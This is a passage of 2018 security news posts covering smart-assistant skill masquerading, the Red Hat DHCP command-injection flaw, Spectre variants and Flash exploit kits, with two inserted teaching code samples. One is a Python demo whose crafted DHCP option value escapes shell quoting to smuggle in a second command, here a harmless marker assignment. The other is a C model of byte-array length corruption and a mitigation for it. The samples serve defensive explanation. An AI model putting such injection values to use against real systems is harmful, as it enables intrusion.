Researchers identified two ways this attack can be made: in-communication skill switch and faking termination. The former takes advantage of the false assumption that smart assistants readily switch from one skill to another once users invoke a new one. Going back to our previous example, if Capital Won is already running and the user decides to ask “Alexa, what’ll the weather be like today?”, Capital Won then pretends to hand over control to the Weather skill in response to the invocation when, in fact, it is still Capital Won running but this time impersonating the Weather skill.

As for the latter, faking termination abuses voluntary skill termination, a feature wherein a skill can end itself after delivering a voice response such as “Goodbye!” to users. A malicious skill can be programmed to say “Goodbye!” but remain running and listening in the background for a given length of time.

But…I like my smart assistant!

No need to box up your smart speakers and send them back if these vulnerabilities worry you. But it is essential for users to really get to know how their voice assistant works. We believe that doing so can make a significant difference in maintaining one’s privacy and protecting against attacks.

“Making devices, such as Alexa, responsible for important systems and controls around the house is concerning, especially when evidence emerges that it’s able to turn a simple mistake into a potentially serious consequence,” our very own Malware Intelligence Analyst Chris Boyd said in an interview with Forbes.

Smart assistants and IoT, in general, are still fairly new tech, so we expect improvements in the AI, and the security and privacy efforts within this sector. Both Amazon and Google have claimed they already have protections against voice squatting and voice masquerading.

While it is true that the researchers had already met with both firms to help them understand these threats further and offer them mitigating steps, they remain skeptical about whether the protections put in place are indeed adequate. Only time will tell.

The post Researchers discover vulnerabilities in smart assistants’ voice commands appeared first on Malwarebytes Labs.

Quantifying cyber exposure: Attackers are racing ahead

Cybercriminals have a median seven-day window of opportunity during which they can exploit a vulnerability to attack their victims, potentially siphoning sensitive data, launching ransomware attacks and causing extensive financial damage before organizations even take the first step to determine their cyber exposure and whether they are at risk. According to a new Tenable report, it takes a median six days for a cybercriminal to weaponize vulnerabilities once a new public exploit first becomes available. … More

The post Quantifying cyber exposure: Attackers are racing ahead appeared first on Help Net Security.

Critical RCE Flaw Discovered in Blockchain-Based EOS Smart Contract System

Security researchers have discovered a series of new vulnerabilities in EOS blockchain platform, one of which could allow remote hackers to take complete control over the node servers running the critical blockchain-based applications. EOS is an open source smart contract platform, known as 'Blockchain 3.0,' that allows developers to build decentralized applications over blockchain

Smashing Security #079: Mugshots, mobile mania, and back end gurus

A website which demands money if you want your mugshot removed, could “sharenting” lead to a rise in fraud and identity theft, and how could the FBI have overcounted encrypted phones so badly?

All this and much much more is discussed in the latest edition of the “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, who are joined this week by special guest Maria Varmazis.

Penetration Tests Discover All Banks Are Susceptible to Web App Bugs

A series of penetration tests found that every bank is guilty of web application vulnerabilities and insufficient network security measures. According to a recent report from Positive Technologies, Bank Attacks 2018, 100 percent of banks suffered from these vulnerabilities and inadequacies.

The report also found server configuration flaws in all banks, while just over half were found to have improperly managed their user accounts and passwords.

Bank on It: Poor Security Practices

For its report, Positive Technologies analyzed the penetration tests it performed for a set of banks over a three-year period. Its analysis suggests the security level other organizations in the banking sector are likely to have.

The security provider discovered that outdated software comprised the most prevalent type of vulnerabilities affecting banks’ IT assets. This discovery was followed by sensitive data stored in cleartext, dictionary passwords and the use of insecure data transfer protocols — all found in 58 percent of organizations analyzed.

Despite these flaws, penetration testers breached the network perimeter in just 22 percent of cases.

Positive Technologies observed that banks did a good job protecting the network perimeter but failed to safeguard the internal network properly. To illustrate, its researchers discovered dictionary passwords, insufficient protection against recovery of credentials from operating system (OS) memory and insufficient protection of service protocols against attacks at all banks.

These problems led researchers to obtain full control over the infrastructure at all tested banks — with one-third of organizations not even requiring maximum privileges for someone to access the ATMs or payment gateways.

Defending the Internal Network Against Attack

Positive Technologies reported that poor internal network security practices could expose banks to attacks like phishing campaigns. The organization’s cybersecurity resilience lead, Leigh-Anne Galloway, stressed that it’s not impossible to defend against these types of threats. She said banks could effectively prevent loss of funds if they detect an attack in time and implement appropriate security measures.

“Attachments should be scanned in a sandbox, without depending on endpoint antivirus solutions,” Galloway said in a May 2018 press release. “It’s critical to receive and immediately react to alerts with the help of an in-house or contracted 24/7 security operations center. In addition, SIEM [security information and event management] solutions substantially simplify and improve the effectiveness of incident management.”

The security firm also advised in its report that banks should “pool their knowledge” of attacks in an effort to make the industry safer as a whole.

The post Penetration Tests Discover All Banks Are Susceptible to Web App Bugs appeared first on Security Intelligence.

Chinese Hackers Find Over a Dozen Vulnerabilities in BMW Cars

Chinese security researchers have discovered more than a dozen vulnerabilities in the onboard compute units of BMW cars, some of which can be exploited remotely to compromise a vehicle. The security flaws have been discovered during a year-long security audit conducted by researchers from Keen Security Lab, a cybersecurity research unit of Chinese firm Tencent, between January 2017 and

New Spectre-like flaw found in CPUs using speculative execution

A new flaw that can allow an attacker to obtain access to sensitive information on affected systems has been discovered in modern CPUs. CVE-2018-3639, discovered independently by Google Project Zero and Microsoft Security Response Center researchers and dubbed “Variant 4,” is a Speculative Store Bypass (SSB) vulnerability, and is considered to be a new variant of the previously revealed Spectre Variant 1 vulnerability. “Variant 4 is a vulnerability that exploits ‘speculative bypass.’ When exploited, … More

The post New Spectre-like flaw found in CPUs using speculative execution appeared first on Help Net Security.

The percentage of open source code in proprietary apps is rising

The number of open source components in the codebase of proprietary applications keeps rising and with it the risk of those apps being compromised by attackers leveraging vulnerabilities in them, a recent report has shown. Compiled after examining the findings from the anonymized data of over 1,100 commercial codebases audited in 2017 by the Black Duck On-Demand audit services group, the report revealed that: 96 percent of the scanned applications contain open source components, with … More

The post The percentage of open source code in proprietary apps is rising appeared first on Help Net Security.

A Command Injection Critical Vulnerability Discovered In DHCP




The Dynamic Host Configuration Protocol (DHCP) client shipped with Red Hat Enterprise Linux has a command injection vulnerability that allows an attacker who can run a rogue DHCP server, or otherwise spoof DHCP responses on the local network, to execute commands with root privileges on the client.

The vulnerability, tracked by Red Hat as CVE-2018-1111, was found by Google engineer Felix Wilhelm, who noted that the proof-of-concept exploit is small enough to fit in a tweet. Red Hat rates it a critical vulnerability, as noted in the bug report, since it can be exploited by an unauthenticated attacker with access to the local network.

DHCP is used to assign an IP address, DNS servers and other network configuration attributes to devices on a network, on both wired and wireless networks. Since the only prerequisite for exploitation is being on the same network, the vulnerability is of particular concern for systems that join untrusted public Wi-Fi networks, which in practice means Fedora users on laptops.

Ultimately, any non-isolated network that lets devices join without explicit administrator approval, which is arguably the point of enabling DHCP in the first place, is a risk.

The bug affects RHEL 6.x and 7.x, CentOS 6.x and 7.x, and Fedora 26, 27, 28 and Rawhide. Other operating systems based on Fedora/RHEL are likely affected too, including HPE's ClearOS and Oracle Linux, as well as the recently discontinued Korora Linux. Since the issue lies in a NetworkManager integration script, distributions not derived from Fedora or RHEL are unlikely to be affected.


Another severe flaw in Signal desktop app lets hackers steal your chats in plaintext

For the second time in less than a week, users of the popular end-to-end encrypted Signal messaging app have to update their desktop applications once again to patch another severe code injection vulnerability. Discovered Monday by the same team of security researchers, the newly discovered vulnerability poses the same threat as the previous one, allowing remote attackers to inject malicious

Red Hat Linux DHCP Client Found Vulnerable to Command Injection Attacks

A Google security researcher has discovered a critical remote command injection vulnerability in the DHCP client implementation of Red Hat Linux and its derivatives like Fedora operating system. The vulnerability, tracked as CVE-2018-1111, could allow attackers to execute arbitrary commands with root privileges on targeted systems. Whenever your system joins a network, it’s the DHCP client
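The two DHCP items above give the outcome (a rogue DHCP server gets root on the client through a NetworkManager integration script) but not the primitive, and neither the page nor this example reproduces the proof of concept. The Python below is an added illustration of the general bug class, on the assumption that the flaw has the usual shape: a string received from the DHCP server ends up inside text that the shell parses. It is not the affected script. The option value, the `WPAD_URL` variable name and the probe are the example's own, and the "payload" only sets a marker variable.

```python
"""Why a DHCP option value must never be spliced into shell source.

Models a dispatcher hook that turns a server-supplied option into a shell
variable in three ways and runs each under /bin/sh to see what happens."""
import shlex
import subprocess

# Constructed attacker-controlled value, as a rogue DHCP server could return
# for any string option. It closes the single-quoted string the naive script
# wraps it in, runs an extra command (here a harmless marker assignment),
# and re-opens a quote so the rest of the line still parses.
MALICIOUS_OPTION = "http://proxy.example/wpad.dat'; INJECTED=yes; : '"

# Probe appended to every script: reports the marker and the variable value.
PROBE = '\nprintf "INJECTED=%s\\nWPAD_URL=%s\\n" "${INJECTED:-no}" "$WPAD_URL"\n'


def naive_script_line(value: str) -> str:
    """Vulnerable pattern: the value is pasted into shell source, so the
    shell re-parses it and a quote inside the value becomes syntax."""
    return f"WPAD_URL='{value}'"


def quoted_script_line(value: str) -> str:
    """Hardened pattern: shlex.quote yields one token the shell cannot
    break out of, whatever characters the value contains."""
    return f"WPAD_URL={shlex.quote(value)}"


def _parse(stdout: str) -> dict:
    """Read the probe's two report lines back into a dict."""
    result = {"injected": False, "wpad_url": ""}
    for line in stdout.splitlines():
        if line.startswith("INJECTED="):
            result["injected"] = line[len("INJECTED="):] == "yes"
        elif line.startswith("WPAD_URL="):
            result["wpad_url"] = line[len("WPAD_URL="):]
    return result


def run_script(line: str) -> dict:
    """Run one generated assignment line plus the probe under /bin/sh."""
    proc = subprocess.run(["/bin/sh", "-c", line + PROBE],
                          capture_output=True, text=True, check=True)
    return _parse(proc.stdout)


def run_via_environment(value: str) -> dict:
    """Best pattern: the value never becomes shell source at all; it is
    handed over as an environment variable and only ever read as data."""
    proc = subprocess.run(["/bin/sh", "-c", PROBE],
                          env={"PATH": "/usr/bin:/bin", "WPAD_URL": value},
                          capture_output=True, text=True, check=True)
    return _parse(proc.stdout)


if __name__ == "__main__":
    print("naive:   ", run_script(naive_script_line(MALICIOUS_OPTION)))
    print("quoted:  ", run_script(quoted_script_line(MALICIOUS_OPTION)))
    print("env only:", run_via_environment(MALICIOUS_OPTION))
```

With the naive line the marker comes back as `yes` and the variable holds only the part before the first quote; with the quoted line, and with the environment hand-off, the marker stays `no` and the variable holds the whole string, quotes and all. The third form is the one to prefer in a dispatcher: values that arrive from the network should travel as data (environment, arguments, files) and never be re-parsed by `eval` or a generated script.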

The pace of vulnerability disclosure shows no signs of slowing

Unless the pace of vulnerability disclosure slows down in the coming quarters, we are looking at yet another record-breaking year, according to Risk Based Security’s 2018 Q1 Vulnerability QuickView Report. (Chart note: bug bounties are a subset of the ‘Coordinated Disclosures’ total.) Key findings: 5,375 unique vulnerabilities were reported, just a 1.8% increase over the same period in 2017; note that this number will continue to rise throughout 2018. 1,790 (33.3%) of the … More

The post The pace of vulnerability disclosure shows no signs of slowing appeared first on Help Net Security.

Signal Patches Code Injection Bug that Enabled Remote Code Execution

Signal patched a code injection vulnerability that, when exploited, let attackers achieve remote code execution. The security team for the encrypted communications app, a program which has been available for both Android and iOS since November 2015, published a fix for the bug just hours after first being contacted by a […]… Read More

The post Signal Patches Code Injection Bug that Enabled Remote Code Execution appeared first on The State of Security.

Adobe Releases Critical Security Updates for Acrobat, Reader and Photoshop CC

Adobe has just released new versions of Acrobat DC, Reader and Photoshop CC for Windows and macOS that patch 48 vulnerabilities. A total of 47 affect Acrobat and Reader, and one critical remote code execution flaw has been patched in Photoshop CC. Of those 47, 24 are rated critical—

A week in security (May 7 – May 13)

Last week on Labs, we looked at the case of a fake Android AV, an annoying adware that goes by the name of Kuik, the return of threat actors behind the Shopper Stop tech scam, a new Netflix phishing scam, the recent zero-day vulnerability in Internet Explorer, and the insufficiency of merely relying on the presence of the green padlock. Also, in a brief blog post, we talked about why we removed the blacklist of tech support scammers we have been dutifully maintaining for years.

Other news

Stay safe, everyone!

The post A week in security (May 7 – May 13) appeared first on Malwarebytes Labs.

Simple bug could lead to RCE flaw on apps built with Electron Framework

A critical remote code execution vulnerability has been discovered in the popular Electron web application framework that could allow attackers to execute malicious code on victims' computers. Electron is an open source app development framework that powers thousands of widely-used desktop applications including WhatsApp, Skype, Signal, Wordpress, Slack, GitHub Desktop, Atom, Visual Studio

New Rowhammer Attack Can Hijack Computers Remotely Over the Network

Exploiting Rowhammer just got easier. Dubbed ‘Throwhammer,’ the newly discovered technique could allow attackers to launch a Rowhammer attack on targeted systems just by sending specially crafted packets to vulnerable network cards over the local area network. Known since 2012, Rowhammer is a severe issue with recent-generation dynamic random access memory (DRAM) chips in

Zero-day flaw exploited in targeted attacks is fixed by Microsoft

This month's Patch Tuesday bundle of updates from Microsoft included a fix for a critical vulnerability that has been actively exploited by at least one hacking gang in targeted attacks.

The post Zero-day flaw exploited in targeted attacks is fixed by Microsoft appeared first on The State of Security.

Microsoft Patches Two Zero-Day Flaws Under Active Attack

It's time to gear up for the latest May 2018 Patch Tuesday. Microsoft has today released security patches for a total of 67 vulnerabilities, including two zero-days that have actively been exploited in the wild by cybercriminals, and two publicly disclosed bugs. In brief, Microsoft is addressing 21 vulnerabilities that are rated as critical, 42 rated important, and 4 rated as low severity.

A Simple Tool Released to Protect Dasan GPON Routers from Remote Hacking

Since hackers have started exploiting two recently disclosed unpatched critical vulnerabilities found in GPON home routers, security researchers have now released an unofficial patch to help millions of affected users left vulnerable by their device manufacturer. Last week, researchers at vpnMentor disclosed details of—an authentication bypass (CVE-2018-10561) and a root-remote code execution

8 New Spectre-Class Vulnerabilities (Spectre-NG) Found in Intel CPUs

A team of security researchers has reportedly discovered a total of eight new "Spectre-class" vulnerabilities in Intel CPUs, which also affect at least a small number of ARM processors and may impact AMD processor architecture as well. Dubbed Spectre-Next Generation, or Spectre-NG, the partial details of the vulnerabilities were first leaked to journalists at German computer magazine Heise,

GLitch: New ‘Rowhammer’ Attack Can Remotely Hijack Android Phones

For the very first time, security researchers have discovered an effective way to exploit a four-year-old hacking technique called Rowhammer to hijack an Android phone remotely. Dubbed GLitch, the proof-of-concept technique is a new addition to the Rowhammer attack series which leverages embedded graphics processing units (GPUs) to carry out a Rowhammer attack against Android smartphones.

Does Your Family Need a VPN? Here are 3 Reasons it May Be Time

At one time Virtual Private Networks (VPNs) used to be tools exclusive to corporations and techie friends who appeared overly zealous about masking their online activity. However, with data breaches and privacy concerns at an all-time high, VPNs are becoming powerful security tools for anyone who uses digital devices.

What’s a VPN?

A VPN allows users to securely access a private network and share data remotely through public networks. Much like a firewall protects the data on your computer, a VPN protects your activity by encrypting (or scrambling) your data when you connect to the internet from a remote or public location. A VPN allows you to hide your location, IP address, and online activity.

For instance, if you need to send a last-minute tax addendum to your accountant or a legal contract to your office but must use the airport’s public Wi-Fi, a VPN would protect that data by creating an encrypted tunnel for it to travel through while you are connected to the open network. Or, if your child wants to watch a YouTube or streaming video while on vacation and only has access to the hotel’s Wi-Fi, a VPN would encrypt your child’s traffic and allow a more secure internet connection. Without a VPN, any traffic that is not already protected by HTTPS or another encrypted protocol, whether from games, social networks or email, can be read by anyone else on the same open Wi-Fi network, since the network itself provides no encryption.

Why VPNs matter

  • Your family is constantly on the go. If you find yourself conducting a lot of business on your laptop or mobile device, a VPN could be an option for you. Likewise, if you have a high school or college-aged child who likes to take his or her laptop to the library or coffee shop to work, a VPN would protect data sent or received from that location. Enjoy shopping online whenever you feel the urge? A VPN also has the ability to mask your physical location, banking account credentials, and credit card information. If your family shares a data plan like most, connecting to public Wi-Fi has become a data/money-saving habit. However, it’s a habit that puts you at risk of nefarious people eavesdropping, stealing personal information, and even infecting your device. Putting a VPN in place, via a subscription service, could help curb this risk. In addition, a VPN can encrypt conversations via texting apps and help keep private chats and content private.
  • You enjoy connected vacations/travel. It’s a great idea to unplug on vacation but let’s be honest, it’s also fun to watch movies, check in with friends via social media or email, and send Grandma a few pictures. Service to some of your favorite online streaming sites can be interrupted when traveling abroad. A VPN allows you to connect to a proxy server that will access online sites on your behalf and allow a secure and easier connection most anywhere you go.
  • Your family’s data is a big deal. Protecting personal information is a hot topic these days and for good reason. Much of what we do online can be tracked by Internet Service Providers (ISPs). Each device that connects to a network is assigned an Internet Protocol (IP) address, which, much like an identification number, lets it communicate on the network and lets others tie activity back to it. A VPN routes your traffic through the VPN provider’s servers, so the sites you visit see the provider’s IP address rather than yours; the VPN provider itself can still see your traffic, which is why choosing a trustworthy one matters. A favorite entry point hackers use to eavesdrop on your online activity is public Wi-Fi and unsecured networks. In addition to potentially stealing your private information, hackers can also use public Wi-Fi to distribute malware. Using a VPN cuts cyber crooks off from their favorite watering hole: public Wi-Fi!

As you can see VPNs can give you an extra layer of protection as you surf, share, access, and receive content online. If you look for a VPN product to install on your devices, make sure it’s a product that is trustworthy and easy to use, such as McAfee’s Safe Connect. A robust VPN product will provide bank-grade encryption to ensure your digital data is safe from prying eyes.

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures).

The post Does Your Family Need a VPN? Here are 3 Reasons it May Be Time appeared first on McAfee Blogs.

Hackers find an ‘unpatchable’ way to breach the Nintendo Switch

Security researchers from ReSwitched have discovered a Nintendo Switch vulnerability that could let hackers run arbitrary code on all current consoles. Dubbed "Fusée Gelée" ("Frozen Rocket") it exploits buggy code in the NVIDIA Tegra X1's USB recovery mode, bypassing software that would normally protect the critical bootROM. Most worrisome for Nintendo is that the bug appears to be unpatchable and could allow users to eventually run pirated games.

Via: Ars Technica

Source: Kate Temkin (Github)

Despite Decline in Use of Adobe Flash, Vulnerabilities Will Continue to Cause Concern

This post was researched and written with the assistance of Tim Hux, Abhishek Karnik, Asheer Malhotra, and Steve Povolny

McAfee Advanced Threat Research team analysts have studied Adobe Flash Player for years because it is a popular target for attacks. As always, we advise customers to remain current with McAfee’s latest DAT versions. In this post we want to provide some insight into the history of Flash exploitation and possible future trends.

Morphisec published an analysis of a new Flash flaw, CVE-2018-4878, that has been exploited in the wild. Hardik Shah of McAfee Labs posted a technical analysis of CVE-2018-4878’s mechanisms on March 2:

“The number of Flash Player exploits has recently declined, due to Adobe’s introduction of various measures to strengthen Flash’s security. Occasionally, however, an exploit still arises. On January 31, Kr-Cert reported a zero-day vulnerability, identified as CVE-2018-4878, being exploited in the field. (Adobe has released an update to fix this flaw.)”

Details about McAfee protections covering CVE-2018-4878 appear at the end of this article.

This post will examine the history of Flash’s issues since the first Common Vulnerabilities and Exposures (CVE) list for Flash was published in 2006. By examining some of the data, both users and owners of sites that employ Flash can better understand Flash flaws and why Flash will continue to interest attackers, even though Adobe will discontinue development of Flash in 2020.

We examined historical Flash data regarding vulnerabilities. We also accounted for the current distribution and uses of Flash. Through this analysis, we believe that despite Adobe announcing Flash’s end of life, a number of sites will continue to use and depend upon Flash for at least the immediate future, even as sites convert to alternative technologies. (See the list of example sites, below.) Flash continues to offer attackers an exploitable collection of flaws for the immediate future.

The following chart uses CVE data. Although not every exploitable and exploited condition receives a CVE entry, most flaws that are discovered through security research or reported against major software vendors’ products eventually gain a CVE number that is posted to the CVE database kept by MITRE. Therefore, CVE offers a convenient repository of vulnerability data to aid research.

Searching the entire database for every instance of “Flash Player” or “Adobe Flash Player” returned 1,050 CVE entries from the years 2006-2017.

There was a steady increase in reported vulnerabilities between 2006 and 2014. Then we saw a big jump in 2015 and 2016. Of the 1,050 issues, about 79% (830) gave attackers some sort of code execution capability, though not every one of those 830 flaws allowed remote code execution. Still, an attacker gains a significant advantage from running any code. The McAfee Labs analysis shows that CVE-2018-4878 was another example of remote code execution, which usually leads to full compromise. This point suggests that Flash vulnerabilities will remain a significant target.

The data source CVE Details offers the following distribution of Flash CVE vulnerabilities:

Source: CVE Details.

In 2015 through 2017, 81% of flaws resulted in code execution of one form or another.

CVE Details also assigns Common Vulnerability Scoring System (CVSS) scores to Flash issues. Many issues from 2015–2017 earned scores of 9 or above, the top of the scale, which marks them as severe.

  • 2015: 294 vulnerabilities ≥ 9
  • 2016: 224 vulnerabilities ≥ 9
  • 2017: 60 vulnerabilities ≥ 9

These severe scores further highlight why attackers remain interested in exploiting Flash weaknesses; they offer significant “attacker value” for the effort required to exploit them. Looking at the historical distribution of issues, we see a spike in 2015, after which the count drops off. It was in the latter part of 2014 that Adobe adopted a change in its software security strategy.

“Finding and fixing bugs isn’t the way to go, it’s … making it harder and more expensive for [attackers] to achieve an outcome,” said Adobe’s Chief Security Officer, Brad Arkin, at a conference in October 2014. He urged organizations to stop patching every vulnerability and instead increase the cost of exploitation to frustrate attackers. “The bad guys aren’t stupid,” he added. “They are going to apply their resources in the [most] cost efficient way possible, and so they seek to minimize the cost of developing an exploit.”

Adobe’s shift in software security strategy has been to make exploiting issues prohibitively expensive so that attackers will find easier, less resource-intensive, and perhaps more reliable methods. Rather than chase every flaw, Adobe’s approach focuses on building defensive techniques that protect vulnerabilities, just as standard secure development life cycle techniques attempt to prevent new vulnerabilities from being released.

Little in software development happens immediately, especially on a large scale. There is typically a lag—usually one to two years—between a strategy shift and results. In any event, the first issues to be eliminated are often the easiest to fix. As the program’s effectiveness improves, resources are available to address harder problems.

Brad Arkin spoke about a strategy shift in the fall of 2014. We expected that shift to take time, and that is what we see in the data: In 2016, the number of newly discovered issues began to decline. However, the steep increase in vulnerabilities in 2015 and 2016 requires some additional examination.

When security researchers focus on a code base, they generally start by finding the easiest-to-discover issues. As these are found and fixed, researchers probe deeper, shifting to techniques that increase in difficulty. Due to this ever-increasing difficulty, we often see a decrease in discoveries; it takes more time and effort to uncover tricky issues.

Coupling the increasing difficulty of finding problems against the increase in effectiveness of a software security program, we find a distribution like what we have seen with Flash CVE reporting from 2015 through 2017. Until 2015, attackers exploited relatively easy-to-find cross-site scripting errors, but these largely disappeared after 2014. Suddenly, in 2015, there is a huge jump in the discovery of difficult-to-uncover memory issues and code execution opportunities. The leap in the CVE numbers reflects more technically challenging issues surfacing just as Adobe’s software strategy was making its shift.

The new strategy had not had time to be fully effective by 2015. Plus, Flash, like all complex software, carries a large amount of legacy code. Just when researchers were digging deeper and harder into the code base, Adobe’s software security change required not just chasing vulnerability fixes, but also generating protective code and designs—all of which take time to implement. This typical situation explains the influx of critical new issues in 2015, and their subsequent continuous reductions.

Still, no single or collection of security techniques is perfect. In 2017, Flash marked 70 new issues. So far in 2018, three have been discovered. The most recent, CVE-2018-4878, is technically challenging and appears to be within protections that Adobe has placed within byte arrays to prevent these memory structures from being misused. “[CVE-2018-4878] bypassed the byte array mitigation feature that was introduced to prevent ‘length corruption’ attacks in Flash,” wrote McAfee’s Hardik Shah in “How Hackers Bypassed an Adobe Flash Protection Mechanism.”

It is just as possible to unwittingly add an exploitation opportunity when implementing software protections as when writing any other code. Of the 73 vulnerabilities discovered in 2017 and 2018, there is no method, without tracking code changes, to know when each of the flaws was introduced. It is likely that some of them arose in code carried forward from earlier versions, that is, from legacy code. Software implementers have a compelling argument to reuse as much code as possible in each new version. It is cheaper because it saves time.

In a product with a history as long as Flash’s (more than 10 years), some of its code was written for a different threat landscape, not for today’s attackers and their more sophisticated tools and techniques. It is reasonable to suspect that a significant portion of the last two years’ worth of newly discovered issues are in code that has been carried into the latest versions. Those flaws contrast with the most recent vulnerability, CVE-2018-4878, which bypasses and abuses protections that were likely put into place after Adobe’s shift in strategy. The code that CVE-2018-4878 abuses was intended to make exploitation of byte arrays “more expensive.”
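As an added illustration (not Adobe's code, and not the CVE-2018-4878 exploit), the following C model shows what a "length corruption" attack on a byte-array-style object is and how a cookie-based length check, in the spirit of Adobe's Vector-length hardening, makes it more expensive. The object layout, the cookie value and every function name are hypothetical; a real runtime would use a random per-process cookie the attacker cannot read.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Hypothetical byte-array heap object. The attacker's goal in a "length
 * corruption" attack is to inflate `length` through some other memory bug so
 * that every later bounds check lets reads and writes run past `data`. */
typedef struct {
    uint32_t length;        /* trusted by unmitigated code */
    uint32_t length_check;  /* mitigation: length ^ secret cookie */
    uint8_t *data;
} ByteArray;

/* In a real runtime this is a random per-process value the attacker cannot
 * read; it is a constant here only so the example is deterministic. */
static const uint32_t g_cookie = 0x5A17C0DEu;

static ByteArray *ba_new(uint32_t len) {
    ByteArray *ba = calloc(1, sizeof *ba);
    if (!ba) return NULL;
    ba->length = len;
    ba->length_check = len ^ g_cookie;
    ba->data = calloc(len ? len : 1, 1);
    return ba;
}

static void ba_free(ByteArray *ba) {
    if (ba) { free(ba->data); free(ba); }
}

/* Pre-mitigation bounds decision: trusts ba->length exactly as found in memory. */
static int ba_index_ok_unmitigated(const ByteArray *ba, uint32_t idx) {
    return idx < ba->length;
}

/* Mitigated bounds decision: a length that no longer agrees with the
 * cookie-derived check value is treated as corruption and refused. */
static int ba_index_ok_mitigated(const ByteArray *ba, uint32_t idx) {
    if ((ba->length ^ g_cookie) != ba->length_check) return 0;
    return idx < ba->length;
}

/* Accessor used by honest code paths: returns 0 and the byte, or -1. */
int ba_get(const ByteArray *ba, uint32_t idx, int *out) {
    if (!ba_index_ok_mitigated(ba, idx)) return -1;
    *out = ba->data[idx];
    return 0;
}

/* Scenario: a 16-byte array whose length field an attacker overwrites with
 * 0x7FFFFFFF. If attacker_patches_check is set, the attacker also overwrites
 * the check field with `guess`. Nothing out of bounds is dereferenced; the
 * result only reports which bounds decision would have let index 4096 through:
 *   bit 0 = unmitigated code accepts it, bit 1 = mitigated code accepts it. */
unsigned simulate_length_corruption(int attacker_patches_check, uint32_t guess) {
    ByteArray *ba = ba_new(16);
    if (!ba) return 0xFFu;
    ba->length = 0x7FFFFFFFu;                    /* the corruption primitive */
    if (attacker_patches_check) ba->length_check = guess;
    unsigned r = 0;
    if (ba_index_ok_unmitigated(ba, 4096)) r |= 1u;
    if (ba_index_ok_mitigated(ba, 4096))   r |= 2u;
    ba_free(ba);
    return r;
}

/* The one way the check is defeated: knowing the secret. A leak of g_cookie
 * is therefore the next bug class to worry about once this mitigation is in. */
uint32_t forged_check_for(uint32_t corrupted_length) {
    return corrupted_length ^ g_cookie;
}

/* Honest path: in-range access works, out-of-range access is refused. */
int demo_honest_access(void) {
    ByteArray *ba = ba_new(8);
    if (!ba) return 0;
    ba->data[3] = 0x41;
    int v = -1;
    int ok = ba_get(ba, 3, &v) == 0 && v == 0x41 && ba_get(ba, 8, &v) == -1;
    ba_free(ba);
    return ok;
}

int main(void) {
    printf("check untouched: %u, wrong guess: %u, forged with cookie: %u, honest: %d\n",
           simulate_length_corruption(0, 0),
           simulate_length_corruption(1, 0x7FFFFFFFu ^ 0xDEADBEEFu),
           simulate_length_corruption(1, forged_check_for(0x7FFFFFFFu)),
           demo_honest_access());
    return 0;
}
```

The simulation corrupts only the length field, which is typically all an attacker gets from a separate memory bug. With the check in place a corrupted length is useless unless the attacker also knows the cookie, so a mitigation like this turns an exploit-development problem into an information-leak problem rather than eliminating it; CVE-2018-4878 is a reminder that the protective code itself can also carry bugs.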

To measure the popularity of Flash, we turned to Q-Success’ W3Techs web survey data. The following table shows the use of four client-side languages, with Flash declining steadily since 2011. JavaScript, on the other hand, today is nearly ubiquitous, at 95%. The two leading languages are graphed in the chart that follows the table.

Historical Yearly Trends in the Usage of Client-Side Programming Languages for Websites

Usage (in % of sites) of Client-Side Programming Languages for Websites

Chart data as of March 8, 2018. Source for table and chart: © 2009-2018 Q-Success DI Gelbmann GmbH

From W3Techs data, we can see that Flash use has declined steadily, to only 5% of surveyed web sites. Doesn’t that suggest that Flash exploitation would also decline or even stop? Unfortunately, it does not.

The following W3Techs chart shows that although the number of sites using Flash is fairly low, enough high-traffic sites employ it to keep Flash popular.

High-Traffic Sites That Still Use Adobe Flash

Source: PublicWWW.

If popular websites continue to use Flash, then Flash Player will remain in use on users’ machines for some time. Adobe has promised to continue supporting Flash Player until the end of 2020. Unfortunately, end of life merely means that after that date no further updates, features, or patches will be released; it does not by itself reduce Flash’s installed base. Only the end of websites requiring Flash will remove its vulnerabilities from the security picture.

A highly targeted attack may need to compromise only a single computer to access an organization’s digital infrastructure and gain access to strategic targets. That single computer could be running an unpatched or dated version of Flash.

As the use of Flash has declined, client-side JavaScript has become the de facto browser programming language. Yet JavaScript’s takeover does not fully solve the problem because it can deliver a Flash payload. Although some of the Flash vulnerabilities we have analyzed can be exploited remotely, many cannot. An attacker often requires some interaction by the victim to run a Flash exploit. JavaScript has become an increasingly common delivery mechanism for this purpose.

DIY: Exploits in a Kit

Perhaps more important to attackers is the easy availability of Flash exploits ready to use in numerous exploit “kits.” Kits package all the necessary code to exercise a set of known vulnerabilities. Access to readily available exploits in a kit means far less attacker effort. Kits also “lower the technical bar.” Attackers need not understand how an exploit works; they can simply leverage the packages without knowing the technical details.

Old Flash exploits are still available, along with new ones such as CVE-2018-4878, according to Tim Hux of the McAfee Advanced Threat Research team. “The Bizarro Sundown (aka GreenFlash) and ThreadKit exploit kits added the exploit to their lists last month,” he said. “The Rig and Magnitude exploit kits added this flaw to their arsenals this month.”

Adding a new exploit does not mean the old ones are no longer available. Exploit kits are additive. The Rig kit, which appeared in 2014, contains the following Flash exploits:

  • CVE-2013-0634
  • CVE-2014-0497
  • CVE-2014-0515
  • CVE-2014-0569
  • CVE-2015-0311
  • CVE-2015-0359
  • CVE-2015-3090
  • CVE-2015-3113
  • CVE-2015-5119
  • CVE-2015-5122
  • CVE-2015-7645
  • CVE-2016-1019
  • CVE-2016-4117

Old exploits do not die; they just get used less often as installed software is upgraded past the vulnerable versions. If an attacker finds a vulnerable version of Flash in use, kits will have exploits to employ.

Conclusion

It is difficult to prove that software is error free, and no general automated method can do it. (Alan Turing’s halting-problem result shows that no algorithm can decide, for every program, whether it will halt, and Rice’s theorem extends that to every nontrivial property of a program’s behavior.) As famed computer scientist Edsger Dijkstra noted, “Testing shows the presence, not the absence of bugs.” (“Software Engineering Techniques,” NATO Science Committee, page 16.) In other words, even software that has passed a battery of security tests before release may still contain exploitable conditions.

From our analysis of the relationship between Flash CVEs and Flash’s ongoing use, especially on high-traffic sites, McAfee’s Advanced Threat Research team believes that Flash vulnerabilities will continue to offer attackers a means toward malicious ends. However, Adobe’s shift in security strategy is an excellent step in reducing the number of newly discovered issues, which should maintain their decline.

McAfee protections for CVE-2018-4878

McAfee’s malware engine can parse Flash for malicious content. Customers who have turned on automatic updates or who update regularly have been protected against seven new variants of CVE-2018-4878 since February 6.

McAfee Host Intrusion Prevention signatures 8001, 1149, 6011, and 6010 detect CVE-2018-4878 exploits.

